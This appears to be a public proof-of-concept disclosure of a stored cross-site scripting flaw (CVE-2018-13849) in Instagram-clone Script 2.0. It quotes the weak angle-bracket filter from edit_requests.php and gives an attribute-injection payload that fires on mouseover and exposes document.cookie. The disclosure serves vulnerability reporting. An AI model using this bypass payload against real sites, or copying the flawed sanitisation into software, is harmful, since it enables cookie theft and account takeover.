# Exploit Title: Instagram-clone Script 2.0 - Cross-Site Scripting
# Date: 2018-07-10
# Exploit Author: L0RD
# Vendor Homepage: https://github.com/yTakkar/Instagram-clone
# Version: 2.0
# CVE: CVE-2018-13849
# Tested on: Kali linux
# POC : Persistent Cross site scripting :
# vulnerable file : edit_requests.php
# vulnerable code :
if (isset($_POST['username'])) {
$username = preg_replace("#[<> ]#i", "", $_POST['username']);
$firstname = preg_replace("#[<> ]#i", "", $_POST['firstname']);
$surname = preg_replace("#[<> ]#i", "", $_POST['surname']);
$bio = preg_replace("#[<>]#i", "", $_POST['bio']);
$instagram = preg_replace("#[<>]#i", "", $_POST['instagram']);
$youtube = preg_replace("#[<>]#i", "", $_POST['youtube']);
$facebook = preg_replace("#[<>]#i", "", $_POST['facebook']);
$twitter = preg_replace("#[<>]#i", "", $_POST['twitter']);
$website = preg_replace("#[<>]#i", "", $_POST['website']);
$mobile = preg_replace("#[^0-9]#i", "", $_POST['mobile']);
$tags = preg_replace("#[\s]#", "-", $_POST['tags']);
$session = $_SESSION['id'];
$m=$edit->saveProfileEditing($username, $firstname, $surname, $bio,
$instagram, $youtube, $facebook, $twitter, $website, $mobile, $tags);
$array = array("mssg" => $m);
echo json_encode($array);
}
# We use this payload to bypass filter :
# Payload :
"onmouseover=" alert(document.cookie)